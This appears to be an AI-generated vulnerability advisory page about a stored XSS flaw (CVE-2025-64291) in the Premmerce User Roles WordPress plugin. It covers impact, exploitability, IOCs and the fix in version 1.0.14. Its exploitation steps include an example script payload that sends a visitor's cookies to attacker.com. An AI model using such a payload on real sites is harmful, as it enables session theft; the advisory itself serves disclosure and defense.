CVE-2025-64291
WordPress vulnerability analysis and mitigation

Overview

CVE-2025-64291 is a Stored Cross-Site Scripting (XSS) vulnerability in the Premmerce User Roles WordPress plugin, affecting all versions up to and including 1.0.13. The vulnerability was reported by security researcher Nabil Irawan on April 10, 2025, disclosed publicly on May 10, 2025 via Patchstack, and assigned a CVE on October 29, 2025. It carries a CVSS v3.1 base score of 5.9 (Medium), requiring high privileges and user interaction for exploitation (Patchstack).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), a Stored XSS flaw in the Premmerce User Roles plugin for WordPress. An attacker with Administrator-level privileges can inject malicious scripts into plugin-controlled fields that are subsequently stored in the database and rendered to other users visiting affected pages. Exploitation requires user interaction — a privileged user must trigger the stored payload, for example by visiting an admin page where the malicious content is rendered. No public proof-of-concept code has been identified (Patchstack).

Impact

Successful exploitation allows an attacker to inject and persistently store malicious JavaScript or HTML payloads within the WordPress site, which are then executed in the browsers of users who visit affected pages. This can lead to session hijacking, credential theft, unauthorized actions performed on behalf of victims, or redirection to malicious sites. The scope is changed (S:C in CVSS terms), meaning the impact can extend beyond the plugin itself to affect site visitors and other authenticated users (Patchstack).

Exploitability

There is no known public exploit code, active in-the-wild exploitation, or threat actor attribution associated with CVE-2025-64291. The EPSS score is approximately 0.029% (0.000290), indicating a very low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Patchstack classifies this as low priority with no impactful threat currently observed (Patchstack).

Exploitation steps

  1. Gain Administrator Access: Obtain or compromise an Administrator-level account on a WordPress site running Premmerce User Roles version 1.0.13 or earlier.
  2. Identify Injection Point: Navigate to the Premmerce User Roles plugin settings or user role management interface in the WordPress admin panel to locate input fields that are stored and later rendered without proper sanitization.
  3. Inject Malicious Payload: Enter a crafted XSS payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into a vulnerable input field and save the configuration.
  4. Trigger Execution: The stored payload is rendered when any user (admin or visitor) loads the affected page, causing the malicious script to execute in their browser context.
  5. Achieve Objective: Collect session cookies, perform actions on behalf of the victim, or redirect users to attacker-controlled infrastructure (Patchstack).

Indicators of compromise

  • Logs: WordPress admin access logs showing unexpected modifications to Premmerce User Roles plugin settings by administrator accounts; unusual POST requests to plugin admin endpoints.
  • File System: Unexpected changes to plugin configuration data stored in the WordPress database (wp_options table) containing script tags or encoded JavaScript.
  • Network: Outbound requests from site visitors' browsers to unknown external domains shortly after loading admin or plugin-related pages; traffic to domains not associated with normal site operation.
  • Browser/Application: Users reporting unexpected redirects, pop-ups, or unauthorized actions occurring when visiting WordPress admin pages related to user role management.

Mitigation and workarounds

The vendor has released version 1.0.14 of the Premmerce User Roles plugin, which patches this vulnerability. Site administrators should update the plugin to version 1.0.14 or later immediately via the WordPress plugin dashboard. Patchstack users can enable auto-update for vulnerable plugins as an additional safeguard. If an immediate update is not possible, restrict access to the WordPress admin panel to trusted IP addresses and limit the number of accounts with Administrator privileges (Patchstack).

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-78361CRITICAL9.1
  • zipmoney-payments-woocommerce
NoYesSep 10, 2026
CVE-2026-82925HIGH8.1
  • site-reviews
NoYesSep 10, 2026
CVE-2026-77771HIGH7.5
  • miniorange-2-factor-authentication
NoYesSep 10, 2026
CVE-2026-81431HIGH7.2
  • registration-form-for-woocommerce
NoYesSep 10, 2026
CVE-2026-15889MEDIUM6.4
  • aruba-hispeed-cache
NoYesSep 10, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management